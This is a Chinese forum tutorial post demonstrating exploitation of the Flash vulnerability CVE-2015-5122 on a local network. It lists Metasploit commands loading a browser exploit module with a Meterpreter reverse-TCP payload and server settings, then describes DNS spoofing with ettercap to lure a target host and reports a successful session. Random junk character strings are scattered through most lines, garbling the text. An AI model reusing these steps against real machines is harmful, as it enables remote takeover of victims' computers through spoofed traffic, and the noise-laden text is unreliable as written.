% ?- c! n; ^; p& s0 |. d 二、cve2015-5122漏洞实例演示虚拟机
: n- c) M9 @2 U4 I2 b. K关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
+ _" c7 d, z: \0 G' |* j/ Y. bsearch cve-2015-5122如图:
3 c- z$ Z z$ y3 ^+ X. ` Y$ X
下面我们敲如下命令: a$ ?4 x, @; L0 s" r% ^- r" @8 z
: L+ K |1 M7 {; o9 D; E% ~4 K9 H use exploit/multi/browser/adobe_flash_opaque_background_uaf : }5 Q' e* z/ ~/ t
$ H- e) M: e0 g/ M% M% Z1 S" ] set PAYLOAD windows/meterpreter/reverse_tcp
, s# s) g) y8 J- E. M! T( Z& f! o/ Q! x2 H, O8 \ set LHOST 192.168.0.109 2 k# h7 t' O4 b# k# v+ @
set URIPATH / /*根目录*/
( h6 B' m3 S) Xset SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
( `( u& \3 b: \9 B& v& J& `- I, |5 E: ^ set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 % r p9 J8 m: c
2 l' d$ M& U) x6 L/ j 然后show options如图: " {- Q8 z8 v& U1 m
6 E; g" Z5 b g4 y$ ?5 @, @$ H$ i$ V' f5 s8 o, e
0 ]$ D: Y' Z% h6 G3 O2 w% k) Q' I0 [- I* V5 a
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
$ P, U6 e9 z0 b! f" e/ n! {* J4 i 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
8 t3 @* W# }' Q+ e" e% `2 h! f+ x9 x/ Y/ B5 c Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ; R3 q, I1 S: o/ f
" {. c# g. Z0 E8 Z" y7 @" H- A( h% ~6 z* y5 K# t) ~ 6 H3 `1 f4 D: L) @; ?& M
" n4 R& ]! T7 a* `2 h 成功了,这时候我们断开ettercap,如图: 0 s( ]# y/ [- s2 A: i
3 U6 N0 o A; U
; b2 M. V% p2 Z d7 n- z1 H Screenshot如图: " l/ A Z: v3 n& g- A- v2 ?" \
- n; z5 m( B8 S9 m* {- ~1 \; e" ]; N2 i+ [6 Y
9 v' l9 ]5 |* B! }! G: z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |